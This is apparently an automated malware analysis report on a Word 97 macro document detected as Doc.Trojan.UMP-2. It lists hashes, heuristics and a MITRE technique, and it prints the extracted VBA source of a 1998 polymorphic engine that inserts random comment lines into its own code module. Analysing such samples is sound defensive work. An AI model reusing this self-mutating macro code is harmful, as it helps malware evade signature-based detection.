Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e013575b84aa1732…

MALICIOUS

Office (OLE)

27.0 KB Created: 1998-09-28 13:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3a3f802a28d88c1c6743e52ceebba5a6 SHA-1: a381160264c88606b2a1998d1a23c3191baf5d31 SHA-256: e013575b84aa1732e24a17cabb4824760053f474744dac359febc0ecbc845383
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The critical ClamAV heuristic indicates a detected trojan within an extracted artifact, and the medium heuristic confirms the presence of VBA macros. The extracted VBA code, named 'UMPE', suggests a polymorphic engine designed to obfuscate its functionality, likely to evade detection and execute a malicious payload. The specific purpose of the obfuscated code is not fully discernible due to its polymorphic nature.

Heuristics 1

  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 814 bytes
SHA-256: 60c622ccc8bc11b578c6c0d73b5d64315513ad446921cc94f0602f10115c520a
Detection
ClamAV: Doc.Trojan.UMP-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Модуль1"
Sub UMPE()

'ULTRAS MACRO POLYMORPHIC ENGINE for Word97
'ULTRAS 1998

MuNu = Int(Rnd() * 20 + 1)

For Mutate = 1 To MuNu

MuRL = Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.CountOfLines

MuLi = Int(Rnd() * MuRL + 1)

MuLe = Int(Rnd() * 40 + 1)

For MuGe = 1 To MuLe

LiVe = Int((120 - 100 + 1) * Rnd + 228)

MuRe = MuRe + Chr$(LiVe)

Next MuGe

Application.VBE.ActiveVBProject.VBComponents("zzz").CodeModule.InsertLines MuLi, vbTab & "' " & MuRe

MuRe = ""

Next Mutate

End Sub